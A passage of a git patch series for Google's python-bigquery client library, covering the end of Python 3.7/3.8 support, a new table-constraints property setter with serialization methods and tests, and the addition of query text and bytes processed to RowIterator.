IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 077e465cf..52ccc8ab2 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,4 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/scripts/readme-gen/templates/install_deps.tmpl.rst b/scripts/readme-gen/templates/install_deps.tmpl.rst index 6f069c6c8..f21db80c4 100644 --- a/scripts/readme-gen/templates/install_deps.tmpl.rst +++ b/scripts/readme-gen/templates/install_deps.tmpl.rst @@ -12,7 +12,7 @@ Install Dependencies .. _Python Development Environment Setup Guide: https://cloud.google.com/python/setup -#. Create a virtualenv. Samples are compatible with Python 3.7+. +#. Create a virtualenv. Samples are compatible with Python 3.9+. .. code-block:: bash diff --git a/testing/constraints-3.7.txt b/testing/constraints-3.7.txt deleted file mode 100644 index 55e63449f..000000000 --- a/testing/constraints-3.7.txt +++ /dev/null @@ -1,36 +0,0 @@ -# This constraints file is used to check that lower bounds -# are correct in setup.py -# List *all* library dependencies and extras in this file. -# Pin the version to the lower bound. 
-# -# e.g., if setup.py has "foo >= 1.14.0, < 2.0.0dev", -# Then this file should have foo==1.14.0 -bigquery-magics==0.1.0 -db-dtypes==0.3.0 -geopandas==0.9.0 -google-api-core==2.11.1 -google-auth==2.14.1 -google-cloud-bigquery-storage==2.24.0 -google-cloud-core==2.4.1 -google-cloud-testutils==1.4.0 -google-crc32c==1.5.0 -google-resumable-media==2.0.0 -googleapis-common-protos==1.62.0 -grpcio==1.47.0 -grpcio-status==1.47.0 -ipywidgets==7.7.1 -ipython==7.23.1 -ipykernel==6.0.0 -opentelemetry-api==1.1.0 -opentelemetry-instrumentation==0.20b0 -opentelemetry-sdk==1.1.0 -packaging==20.0.0 -pandas==1.1.0 -proto-plus==1.22.3 -protobuf==3.20.2 -pyarrow==3.0.0 -python-dateutil==2.7.3 -requests==2.21.0 -Shapely==1.8.4 -six==1.13.0 -tqdm==4.7.4 diff --git a/testing/constraints-3.8.txt b/testing/constraints-3.8.txt deleted file mode 100644 index 9883fb8cc..000000000 --- a/testing/constraints-3.8.txt +++ /dev/null @@ -1,11 +0,0 @@ -grpcio==1.47.0 -pandas==1.2.0 - -# This constraints file is used to check that lower bounds -# are correct in setup.py -# -# Pin the version to the lower bound. -# -# e.g., if setup.py has "foo >= 1.14.0, < 2.0.0dev", -# Then this file should have foo==1.14.0 -pandas-gbq==0.26.1 diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index d4c302867..63b5d8bf6 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -4,5 +4,29 @@ # # NOTE: Not comprehensive yet, will eventually be maintained semi-automatically by # the renovate bot. 
+bigquery-magics==0.6.0 +db-dtypes==1.0.4 +geopandas==0.9.0 +google-api-core==2.11.1 +google-auth==2.14.1 +google-cloud-bigquery-storage==2.18.0 +google-cloud-core==2.4.1 +google-resumable-media==2.0.0 grpcio==1.47.0 -pyarrow>=4.0.0 +grpcio==1.49.1; python_version >= '3.11' +ipywidgets==7.7.1 +ipython==7.23.1 +ipykernel==6.2.0 +opentelemetry-api==1.1.0 +opentelemetry-instrumentation==0.20b0 +opentelemetry-sdk==1.1.0 +packaging==24.2.0 +pandas==1.1.4 +pandas-gbq==0.26.1 +proto-plus==1.22.3 +protobuf==3.20.2 +pyarrow==4.0.0 +python-dateutil==2.8.2 +requests==2.21.0 +Shapely==1.8.4 +tqdm==4.7.4 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index a9e76d416..e65fca27e 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1222,7 +1222,12 @@ def test_list_rows_nullable_scalars_extreme_dtypes_w_custom_dtype( # These pandas dtypes are handled by the custom dtypes. assert df.dtypes["bool_col"].name == "boolean" - assert df.dtypes["float64_col"].name == "Float64" + # Result is dependent upon which version of pandas is being used. + # Float64 was not introduced until pandas version 1.4. 
+ if PANDAS_INSTALLED_VERSION >= "1.4": + assert df.dtypes["float64_col"].name == "Float64" + else: + assert df.dtypes["float64_col"].name == "string" assert df.dtypes["int64_col"].name == "Int64" assert df.dtypes["string_col"].name == "string" diff --git a/tests/unit/job/test_copy.py b/tests/unit/job/test_copy.py index 4b0945310..8e2845316 100644 --- a/tests/unit/job/test_copy.py +++ b/tests/unit/job/test_copy.py @@ -147,7 +147,6 @@ def _verifyResourceProperties(self, job, resource): self._verifyReadonlyResourceProperties(job, resource) config = resource.get("configuration", {}).get("copy") - table_ref = config["destinationTable"] self.assertEqual(job.destination.project, table_ref["projectId"]) self.assertEqual(job.destination.dataset_id, table_ref["datasetId"]) diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 3a5d92dbd..2cda59bd1 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -645,6 +645,8 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): ) +# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 +# pragma added due to issues with coverage. 
@pytest.mark.skipif( pandas.__version__.startswith("2."), reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index fdd232a5c..48c085c1d 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -23,10 +23,7 @@ from unittest import mock import warnings -try: - import importlib.metadata as metadata -except ImportError: - import importlib_metadata as metadata +import importlib.metadata as metadata try: import pandas diff --git a/tests/unit/test__versions_helpers.py b/tests/unit/test__versions_helpers.py index b1d0ef1ac..8379c87c1 100644 --- a/tests/unit/test__versions_helpers.py +++ b/tests/unit/test__versions_helpers.py @@ -188,14 +188,19 @@ def test_bqstorage_is_read_session_optional_false(): @pytest.mark.skipif(pandas is None, reason="pandas is not installed") -@pytest.mark.parametrize("version", ["1.5.0", "2.0.0", "2.1.0"]) +@pytest.mark.parametrize("version", ["1.1.5", "2.0.0", "2.1.0"]) def test_try_import_raises_no_error_w_recent_pandas(version): + # Comparing against the minimum allowed pandas version. + # As long as the installed version is greater than that, no + # error is raised. versions = _versions_helpers.PandasVersions() with mock.patch("pandas.__version__", new=version): try: pandas = versions.try_import(raise_if_error=True) assert pandas is not None - except exceptions.LegacyPandasError: # pragma: NO COVER + # this exception should not fire unless there is something broken + # hence the pragma. 
+ except exceptions.LegacyPandasError: # pragma: no cover raise ("Legacy error raised with a non-legacy dependency version.") diff --git a/tests/unit/test_legacy_types.py b/tests/unit/test_legacy_types.py index 809be1855..75f3e77d7 100644 --- a/tests/unit/test_legacy_types.py +++ b/tests/unit/test_legacy_types.py @@ -18,9 +18,9 @@ import warnings try: - import proto # type: ignore + import proto except ImportError: - proto = None + proto = None # type: ignore @pytest.mark.skipif(proto is None, reason="proto is not installed") diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index 73b29df6b..0f1e030cb 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -36,6 +36,7 @@ except ImportError: magics = None + bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") IPython = pytest.importorskip("IPython") interactiveshell = pytest.importorskip("IPython.terminal.interactiveshell") diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 1a3d7ec0f..7644186f3 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -16,7 +16,6 @@ import datetime import logging import re -from sys import version_info import time import types import unittest @@ -2171,10 +2170,11 @@ def test_to_geodataframe(self): df = row_iterator.to_geodataframe(create_bqstorage_client=False) self.assertIsInstance(df, geopandas.GeoDataFrame) self.assertEqual(len(df), 0) # verify the number of rows - if version_info.major == 3 and version_info.minor > 7: - assert not hasattr(df, "crs") # used with Python > 3.7 + + if geopandas.__version__ == "0.9.0": + assert hasattr(df, "crs") else: - self.assertIsNone(df.crs) # used with Python == 3.7 + assert not hasattr(df, "crs") class TestRowIterator(unittest.TestCase): @@ -3699,10 +3699,10 @@ def test_to_dataframe_no_tqdm_no_progress_bar(self): user_warnings = [ warning for warning in warned if warning.category is UserWarning ] - # With Python 3.7 and 3.8, len(user_warnings) = 3. 
With pandas < 1.5, - # pandas.ArrowDtype is not supported. We raise warnings because - # range columns have to be converted to object. - # With higher Python versions and noextra tests, len(user_warnings) = 0 + # With pandas < 1.5, pandas.ArrowDtype is not supported + # and len(user_warnings) = 3. + # We raise warnings because range columns have to be converted to object. + # With higher pandas versions and noextra tests, len(user_warnings) = 0 self.assertIn(len(user_warnings), [0, 3]) self.assertEqual(len(df), 4) @@ -3734,10 +3734,10 @@ def test_to_dataframe_no_tqdm(self): user_warnings = [ warning for warning in warned if warning.category is UserWarning ] - # With Python 3.7 and 3.8, len(user_warnings) = 4. With pandas < 1.5, - # pandas.ArrowDtype is not supported. We raise warnings because - # range columns have to be converted to object. - # With higher Python versions and noextra tests, len(user_warnings) = 1 + # With pandas < 1.5, pandas.ArrowDtype is not supported + # and len(user_warnings) = 4. + # We raise warnings because range columns have to be converted to object. 
+ # With higher pandas versions and noextra tests, len(user_warnings) = 1 self.assertIn(len(user_warnings), [1, 4]) # Even though the progress bar won't show, downloading the dataframe @@ -3991,6 +3991,8 @@ def test_to_dataframe_w_dtypes_mapper(self): ) self.assertEqual(df.name.dtype.name, "string") + # While pyproject.toml lists pandas 1.1 as the lowest supported version of + # pandas, the pip resolver is not able to resolve pandas 1.1 and numpy if hasattr(pandas, "Float64Dtype"): self.assertEqual(list(df.miles), [1.77, 6.66, 2.0]) self.assertEqual(df.miles.dtype.name, "Float64") @@ -4085,7 +4087,6 @@ def test_to_dataframe_w_dtypes_mapper(self): {"start": None, "end": None}, ], ) - else: self.assertEqual( list(df.date), diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 02a7a6a79..9e42fb737 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -12,9 +12,9 @@ # See the License for the specific language governing permissions and # limitations under the License. +from unittest import mock import datetime import decimal -from unittest import mock import pytest @@ -34,12 +34,16 @@ def class_under_test(): return RowIterator +# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 +# pragma added due to issues with coverage. @pytest.mark.skipif( pandas.__version__.startswith("2."), reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", ) -def test_to_dataframe_nullable_scalars(monkeypatch, class_under_test): - # See tests/system/test_arrow.py for the actual types we get from the API. 
+def test_to_dataframe_nullable_scalars( + monkeypatch, class_under_test +): # pragma: NO COVER + """See tests/system/test_arrow.py for the actual types we get from the API.""" arrow_schema = pyarrow.schema( [ pyarrow.field("bignumeric_col", pyarrow.decimal256(76, scale=38)), @@ -129,12 +133,10 @@ def test_to_dataframe_nullable_scalars(monkeypatch, class_under_test): assert df["int64_col"][0] == -7 assert df["numeric_col"][0] == decimal.Decimal("-123.456789") assert df["string_col"][0] == "abcdefg" - # Pandas timedelta64 might be a better choice for pandas time columns. Then # they can more easily be combined with date columns to form datetimes. # https://github.com/googleapis/python-bigquery/issues/862 assert df["time_col"][0] == datetime.time(14, 21, 17, 123456) - assert df["timestamp_col"][0] == pandas.to_datetime("2021-08-09 13:30:44.123456Z") From f8572dd86595361bae82c3232b2c0d159690a7b7 Mon Sep 17 00:00:00 2001 From: Lkhagvadorj Sukhtsoodol Date: Tue, 4 Mar 2025 18:50:05 +0000 Subject: [PATCH 071/202] fix: adding property setter for table constraints, #1990 (#2092) * fix: adding property setter for table constraints, #1990 * fix: adding unit test for to_api_repr() method * fix: adding system test for bigquery table update * fix: adding more test case for table constraints property * fix: adding more test case for table constraints property * fix: linting code * fix: adding unit tests for test table, table constraint and foreign key * fix: linting based on noxfile * fix: linting based on noxfile * fix: adding unit tests and system test * fix: clearing lint error * fix: adding table constraint eq unit tests * fix: adding type to to_api_repr resource --- google/cloud/bigquery/table.py | 45 +++- tests/system/test_client.py | 77 ++++++ tests/unit/test_table.py | 442 +++++++++++++++++++++++++++++++++ 3 files changed, 562 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index e7f3c9a36..9950b1a53 100644 --- 
a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1058,6 +1058,17 @@ def table_constraints(self) -> Optional["TableConstraints"]: table_constraints = TableConstraints.from_api_repr(table_constraints) return table_constraints + @table_constraints.setter + def table_constraints(self, value): + """Tables Primary Key and Foreign Key information.""" + api_repr = value + if not isinstance(value, TableConstraints) and value is not None: + raise ValueError( + "value must be google.cloud.bigquery.table.TableConstraints or None" + ) + api_repr = value.to_api_repr() if value else None + self._properties[self._PROPERTY_TO_API_FIELD["table_constraints"]] = api_repr + @property def resource_tags(self): """Dict[str, str]: Resource tags for the table. @@ -1111,11 +1122,9 @@ def external_catalog_table_options( def foreign_type_info(self) -> Optional[_schema.ForeignTypeInfo]: """Optional. Specifies metadata of the foreign data type definition in field schema (TableFieldSchema.foreign_type_definition). - Returns: Optional[schema.ForeignTypeInfo]: Foreign type information, or :data:`None` if not set. - .. Note:: foreign_type_info is only required if you are referencing an external catalog such as a Hive table. @@ -3404,6 +3413,20 @@ def from_api_repr(cls, api_repr: Dict[str, Any]) -> "ForeignKey": ], ) + def to_api_repr(self) -> Dict[str, Any]: + """Return a dictionary representing this object.""" + return { + "name": self.name, + "referencedTable": self.referenced_table.to_api_repr(), + "columnReferences": [ + { + "referencingColumn": column_reference.referencing_column, + "referencedColumn": column_reference.referenced_column, + } + for column_reference in self.column_references + ], + } + class TableConstraints: """The TableConstraints defines the primary key and foreign key. 
@@ -3425,6 +3448,13 @@ def __init__( self.primary_key = primary_key self.foreign_keys = foreign_keys + def __eq__(self, other): + if not isinstance(other, TableConstraints) and other is not None: + raise TypeError("The value provided is not a BigQuery TableConstraints.") + return ( + self.primary_key == other.primary_key if other.primary_key else None + ) and (self.foreign_keys == other.foreign_keys if other.foreign_keys else None) + @classmethod def from_api_repr(cls, resource: Dict[str, Any]) -> "TableConstraints": """Create an instance from API representation.""" @@ -3440,6 +3470,17 @@ def from_api_repr(cls, resource: Dict[str, Any]) -> "TableConstraints": ] return cls(primary_key, foreign_keys) + def to_api_repr(self) -> Dict[str, Any]: + """Return a dictionary representing this object.""" + resource: Dict[str, Any] = {} + if self.primary_key: + resource["primaryKey"] = {"columns": self.primary_key.columns} + if self.foreign_keys: + resource["foreignKeys"] = [ + foreign_key.to_api_repr() for foreign_key in self.foreign_keys + ] + return resource + def _item_to_row(iterator, resource): """Convert a JSON row to the native object. 
diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 30e9f94a3..9df572b14 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -97,6 +97,10 @@ ], ), ] +TABLE_CONSTRAINTS_SCHEMA = [ + bigquery.SchemaField("id", "INTEGER", mode="REQUIRED"), + bigquery.SchemaField("fk_id", "STRING", mode="REQUIRED"), +] SOURCE_URIS_AVRO = [ "gs://cloud-samples-data/bigquery/federated-formats-reference-file-schema/a-twitter.avro", @@ -901,6 +905,79 @@ def test_update_table_clustering_configuration(self): table3 = Config.CLIENT.update_table(table2, ["clustering_fields"]) self.assertIsNone(table3.clustering_fields, None) + def test_update_table_constraints(self): + from google.cloud.bigquery.table import TableConstraints + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + dataset = self.temp_dataset(_make_dataset_id("update_table")) + + TABLE_NAME = "test_table" + table_arg = Table(dataset.table(TABLE_NAME), schema=TABLE_CONSTRAINTS_SCHEMA) + self.assertFalse(_table_exists(table_arg)) + + table = helpers.retry_403(Config.CLIENT.create_table)(table_arg) + self.to_delete.insert(0, table) + self.assertTrue(_table_exists(table)) + + REFERENCE_TABLE_NAME = "test_table2" + reference_table_arg = Table( + dataset.table(REFERENCE_TABLE_NAME), + schema=[ + bigquery.SchemaField("id", "INTEGER", mode="REQUIRED"), + ], + ) + reference_table = helpers.retry_403(Config.CLIENT.create_table)( + reference_table_arg + ) + self.to_delete.insert(0, reference_table) + self.assertTrue(_table_exists(reference_table)) + + reference_table.table_constraints = TableConstraints( + primary_key=PrimaryKey(columns=["id"]), foreign_keys=None + ) + reference_table2 = Config.CLIENT.update_table( + reference_table, ["table_constraints"] + ) + self.assertEqual( + reference_table2.table_constraints.primary_key, + reference_table.table_constraints.primary_key, + ) + + table_constraints = TableConstraints( + 
primary_key=PrimaryKey(columns=["id"]), + foreign_keys=[ + ForeignKey( + name="fk_id", + referenced_table=TableReference(dataset, "test_table2"), + column_references=[ + ColumnReference(referencing_column="id", referenced_column="id") + ], + ), + ], + ) + + table.table_constraints = table_constraints + table2 = Config.CLIENT.update_table(table, ["table_constraints"]) + self.assertEqual( + table2.table_constraints, + table_constraints, + ) + + table2.table_constraints = None + table3 = Config.CLIENT.update_table(table2, ["table_constraints"]) + self.assertIsNone(table3.table_constraints, None) + + reference_table2.table_constraints = None + reference_table3 = Config.CLIENT.update_table( + reference_table2, ["table_constraints"] + ) + self.assertIsNone(reference_table3.table_constraints, None) + @staticmethod def _fetch_single_page(table, selected_fields=None): iterator = Config.CLIENT.list_rows(table, selected_fields=selected_fields) diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 7644186f3..b846036ab 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -893,6 +893,158 @@ def test_table_constraints_property_getter(self): assert isinstance(table_constraints, TableConstraints) assert table_constraints.primary_key == PrimaryKey(columns=["id"]) + def test_table_constraints_property_setter(self): + from google.cloud.bigquery.table import ( + ColumnReference, + ForeignKey, + PrimaryKey, + TableConstraints, + TableReference, + ) + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + primary_key = PrimaryKey(columns=["id"]) + foreign_keys = [ + ForeignKey( + name="fk_name", + referenced_table=TableReference.from_string( + "my_project.my_dataset.table" + ), + column_references=[ + ColumnReference( + referenced_column="product_id", referencing_column="id" + ) + ], + ) + ] + table_constraints = TableConstraints( + primary_key=primary_key, 
foreign_keys=foreign_keys + ) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == { + "primaryKey": {"columns": ["id"]}, + "foreignKeys": [ + { + "name": "fk_name", + "referencedTable": { + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "table", + }, + "columnReferences": [ + {"referencedColumn": "product_id", "referencingColumn": "id"} + ], + } + ], + } + + def test_table_constraints_property_setter_empty_value(self): + from google.cloud.bigquery.table import TableConstraints + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table.table_constraints = TableConstraints(primary_key=None, foreign_keys=None) + assert table._properties["tableConstraints"] == {} + + def test_table_constraints_property_setter_invalid_value(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + with pytest.raises( + ValueError, + match="value must be google.cloud.bigquery.table.TableConstraints or None", + ): + table.table_constraints = "invalid_value" + + def test_table_constraints_property_setter_none_value(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table.table_constraints = None + assert table._properties["tableConstraints"] is None + + def test_table_constraints_property_setter_only_primary_key_set(self): + from google.cloud.bigquery.table import PrimaryKey, TableConstraints + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + primary_key = PrimaryKey(columns=["id"]) + + table_constraints = TableConstraints(primary_key=primary_key, foreign_keys=None) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == { 
+ "primaryKey": {"columns": ["id"]} + } + + def test_table_constraints_property_setter_only_foriegn_keys(self): + from google.cloud.bigquery.table import ( + ColumnReference, + ForeignKey, + TableConstraints, + TableReference, + ) + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + foreign_keys = [ + ForeignKey( + name="fk_name", + referenced_table=TableReference.from_string( + "my_project.my_dataset.table" + ), + column_references=[ + ColumnReference( + referenced_column="product_id", referencing_column="id" + ) + ], + ) + ] + table_constraints = TableConstraints( + primary_key=None, foreign_keys=foreign_keys + ) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == { + "foreignKeys": [ + { + "name": "fk_name", + "referencedTable": { + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "table", + }, + "columnReferences": [ + {"referencedColumn": "product_id", "referencingColumn": "id"} + ], + } + ] + } + + def test_table_constraints_property_setter_empty_constraints(self): + from google.cloud.bigquery.table import TableConstraints + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table_constraints = TableConstraints(primary_key=None, foreign_keys=None) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == {} + def test_description_setter_bad_value(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) @@ -5889,6 +6041,48 @@ def test__eq__other_type(self): with self.assertRaises(TypeError): foreign_key == "This is not a Foreign Key" + def test_to_api_repr(self): + from google.cloud.bigquery.table import ColumnReference, TableReference + + name = "my_fk" + referenced_table = TableReference.from_string("my-project.mydataset.mytable") + 
column_references = [ + ColumnReference(referencing_column="product_id", referenced_column="id") + ] + foreign_key = self._make_one(name, referenced_table, column_references) + + expected = { + "name": name, + "referencedTable": { + "projectId": "my-project", + "datasetId": "mydataset", + "tableId": "mytable", + }, + "columnReferences": [ + {"referencingColumn": "product_id", "referencedColumn": "id"} + ], + } + self.assertEqual(foreign_key.to_api_repr(), expected) + + def test_to_api_repr_empty_column_references(self): + from google.cloud.bigquery.table import TableReference + + name = "my_fk" + referenced_table = TableReference.from_string("my-project.mydataset.mytable") + column_references = [] + foreign_key = self._make_one(name, referenced_table, column_references) + + expected = { + "name": name, + "referencedTable": { + "projectId": "my-project", + "datasetId": "mydataset", + "tableId": "mytable", + }, + "columnReferences": [], + } + self.assertEqual(foreign_key.to_api_repr(), expected) + class TestTableConstraint(unittest.TestCase): @staticmethod @@ -5906,6 +6100,144 @@ def test_constructor_defaults(self): self.assertIsNone(instance.primary_key) self.assertIsNone(instance.foreign_keys) + def test_constructor_explicit(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + primary_key = PrimaryKey(columns=["my_pk_id"]) + foriegn_keys = [ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference(referencing_column="id", referenced_column="id"), + ], + ), + ] + + table_constraint = self._make_one( + primary_key=primary_key, + foreign_keys=foriegn_keys, + ) + + self.assertEqual(table_constraint.primary_key, primary_key) + self.assertEqual(table_constraint.foreign_keys, foriegn_keys) + + def test_constructor_explicit_with_none(self): + table_constraint = self._make_one(primary_key=None, 
foreign_keys=None) + + self.assertIsNone(table_constraint.primary_key) + self.assertIsNone(table_constraint.foreign_keys) + + def test__eq__primary_key_mismatch(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + foriegn_keys = [ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference(referencing_column="id", referenced_column="id"), + ], + ), + ] + + table_constraint = self._make_one( + primary_key=PrimaryKey(columns=["my_pk_id"]), + foreign_keys=foriegn_keys, + ) + other_table_constraint = self._make_one( + primary_key=PrimaryKey(columns=["my_other_pk_id"]), + foreign_keys=foriegn_keys, + ) + + self.assertNotEqual(table_constraint, other_table_constraint) + + def test__eq__foreign_keys_mismatch(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + primary_key = PrimaryKey(columns=["my_pk_id"]) + + table_constraint = self._make_one( + primary_key=primary_key, + foreign_keys=[ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference( + referencing_column="id", referenced_column="id" + ), + ], + ), + ], + ) + other_table_constraint = self._make_one( + primary_key=primary_key, + foreign_keys=[ + ForeignKey( + name="my_other_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-other-table" + ), + column_references=[ + ColumnReference( + referencing_column="other_id", referenced_column="other_id" + ), + ], + ), + ], + ) + + self.assertNotEqual(table_constraint, other_table_constraint) + + def test__eq__other_type(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + table_constraint = self._make_one( + 
primary_key=PrimaryKey(columns=["my_pk_id"]), + foreign_keys=[ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference( + referencing_column="id", referenced_column="id" + ), + ], + ), + ], + ) + with self.assertRaises(TypeError): + table_constraint == "This is not a Table Constraint" + def test_from_api_repr_full_resource(self): from google.cloud.bigquery.table import ( ColumnReference, @@ -5985,6 +6317,116 @@ def test_from_api_repr_only_foreign_keys_resource(self): self.assertIsNone(instance.primary_key) self.assertIsNotNone(instance.foreign_keys) + def test_to_api_repr(self): + from google.cloud.bigquery.table import ColumnReference, ForeignKey, PrimaryKey + + primary_key = PrimaryKey(columns=["id", "product_id"]) + foreign_keys = [ + ForeignKey( + name="my_fk_name", + referenced_table=TableReference.from_string( + "my-project.my-dataset.products" + ), + column_references=[ + ColumnReference( + referencing_column="product_id", referenced_column="id" + ), + ], + ) + ] + instance = self._make_one(primary_key=primary_key, foreign_keys=foreign_keys) + + expected = { + "primaryKey": { + "columns": ["id", "product_id"], + }, + "foreignKeys": [ + { + "name": "my_fk_name", + "referencedTable": { + "projectId": "my-project", + "datasetId": "my-dataset", + "tableId": "products", + }, + "columnReferences": [ + {"referencingColumn": "product_id", "referencedColumn": "id"}, + ], + } + ], + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_only_primary_key(self): + from google.cloud.bigquery.table import PrimaryKey + + primary_key = PrimaryKey(columns=["id", "product_id"]) + instance = self._make_one(primary_key=primary_key, foreign_keys=None) + expected = { + "primaryKey": { + "columns": ["id", "product_id"], + }, + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_empty_primary_key(self): + from 
google.cloud.bigquery.table import PrimaryKey + + primary_key = PrimaryKey(columns=[]) + instance = self._make_one(primary_key=primary_key, foreign_keys=None) + + expected = { + "primaryKey": { + "columns": [], + }, + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_only_foreign_keys(self): + from google.cloud.bigquery.table import ColumnReference, ForeignKey + + foreign_keys = [ + ForeignKey( + name="my_fk_name", + referenced_table=TableReference.from_string( + "my-project.my-dataset.products" + ), + column_references=[ + ColumnReference( + referencing_column="product_id", referenced_column="id" + ), + ], + ) + ] + instance = self._make_one(primary_key=None, foreign_keys=foreign_keys) + expected = { + "foreignKeys": [ + { + "name": "my_fk_name", + "referencedTable": { + "projectId": "my-project", + "datasetId": "my-dataset", + "tableId": "products", + }, + "columnReferences": [ + {"referencingColumn": "product_id", "referencedColumn": "id"}, + ], + } + ], + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_empty_foreign_keys(self): + foreign_keys = [] + instance = self._make_one(primary_key=None, foreign_keys=foreign_keys) + + expected = {} + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_empty_constraints(self): + instance = self._make_one(primary_key=None, foreign_keys=None) + expected = {} + self.assertEqual(instance.to_api_repr(), expected) + class TestExternalCatalogTableOptions: PROJECT = "test-project" From 2d5f9320d7103bc64c7ba496ba54bb0ef52b5605 Mon Sep 17 00:00:00 2001 From: Huan Chen <142538604+Genesis929@users.noreply.github.com> Date: Fri, 7 Mar 2025 13:58:40 -0800 Subject: [PATCH 072/202] feat: add query text and total bytes processed to RowIterator (#2140) --- google/cloud/bigquery/_job_helpers.py | 2 ++ google/cloud/bigquery/client.py | 8 ++++++++ google/cloud/bigquery/job/query.py | 2 ++ google/cloud/bigquery/table.py | 18 ++++++++++++++++++ 
tests/unit/job/test_query.py | 3 +++ tests/unit/test_client.py | 3 +++ 6 files changed, 36 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index b028cd357..a8373c356 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -526,6 +526,8 @@ def do_query(): query_id=query_results.query_id, project=query_results.project, num_dml_affected_rows=query_results.num_dml_affected_rows, + query=query, + total_bytes_processed=query_results.total_bytes_processed, ) if job_retry is not None: diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 03ded93b1..8bbdd6c32 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4081,6 +4081,8 @@ def _list_rows_from_query_results( query_id: Optional[str] = None, first_page_response: Optional[Dict[str, Any]] = None, num_dml_affected_rows: Optional[int] = None, + query: Optional[str] = None, + total_bytes_processed: Optional[int] = None, ) -> RowIterator: """List the rows of a completed query. See @@ -4128,6 +4130,10 @@ def _list_rows_from_query_results( num_dml_affected_rows (Optional[int]): If this RowIterator is the result of a DML query, the number of rows that were affected. + query (Optional[str]): + The query text used. + total_bytes_processed (Optinal[int]): + total bytes 